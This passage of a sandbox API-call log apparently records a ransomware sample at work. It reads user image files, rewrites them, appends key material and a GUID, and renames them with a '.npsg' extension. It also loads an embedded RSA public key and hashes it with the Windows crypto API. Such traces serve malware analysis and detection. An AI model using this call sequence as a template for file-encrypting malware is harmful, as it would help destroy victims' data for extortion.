(HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400620 [0237.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005c0 [0237.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005d8 [0237.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005a8 [0237.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400638 [0237.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400608 [0237.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005f0 [0237.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400650 [0237.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005f0 | out: hHeap=0x620000) returned 1 [0237.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005f0 [0237.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400608 | out: hHeap=0x620000) returned 1 [0237.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005c0 | out: hHeap=0x620000) returned 1 [0237.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005c0 [0237.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400620 | out: hHeap=0x620000) returned 1 [0237.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0237.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400650 | out: hHeap=0x620000) returned 1 [0237.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0237.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0237.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005c0 | out: hHeap=0x620000) returned 1 [0237.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005f0 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400638 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005d8 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005a8 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400590 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409098 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.374] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0xe1ef, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0xe1ef, lpOverlapped=0x0) returned 1 [0237.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0237.374] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xe1f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.374] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0237.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.375] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.375] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.375] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.375] CloseHandle (hObject=0x644) returned 1 [0237.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0237.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0237.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e728 | out: hHeap=0x620000) returned 1 [0237.382] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\4 FWN8QfMEos_mmG9-wb.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\4 fwn8qfmeos_mmg9-wb.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\4 FWN8QfMEos_mmG9-wb.jpg.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\4 fwn8qfmeos_mmg9-wb.jpg.npsg")) returned 1 [0237.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.383] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.384] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9761e00, ftCreationTime.dwHighDateTime=0x1d5bd60, ftLastAccessTime.dwLowDateTime=0xfcfb5c90, ftLastAccessTime.dwHighDateTime=0x1d5b9f7, ftLastWriteTime.dwLowDateTime=0xfcfb5c90, ftLastWriteTime.dwHighDateTime=0x1d5b9f7, nFileSizeHigh=0x0, nFileSizeLow=0x17571, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DxyCVfw3NYqWMFEr.png", cAlternateFileName="DXYCVF~1.PNG")) returned 1 [0237.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0237.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.385] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\DxyCVfw3NYqWMFEr.png") returned=".png" [0237.385] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\DxyCVfw3NYqWMFEr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\dxycvfw3nyqwmfer.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.386] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=95601) returned 1 [0237.386] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.389] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1754b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.389] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.391] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.391] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x17571, lpOverlapped=0x0) returned 1 [0237.393] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.393] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.393] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.393] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.394] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.394] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.394] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.394] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.394] GetLastError () returned 0x0 [0237.394] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.394] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.394] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.394] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.394] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x17570) returned 0x3b95d50 [0237.395] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409098 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400590 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34090e0 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005a8 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005d8 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400638 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005f0 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.396] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005d8 | out: hHeap=0x620000) returned 1 [0237.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005f0 | out: hHeap=0x620000) returned 1 [0237.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400638 | out: hHeap=0x620000) returned 1 [0237.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400638 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005f0 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34005d8 [0237.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0237.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0237.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005f0 | out: hHeap=0x620000) returned 1 [0237.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005d8 | out: hHeap=0x620000) returned 1 [0237.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400638 | out: hHeap=0x620000) returned 1 [0237.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.397] GetCurrentThreadId () returned 0x5b4 [0237.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.397] RtlAllocateHeap 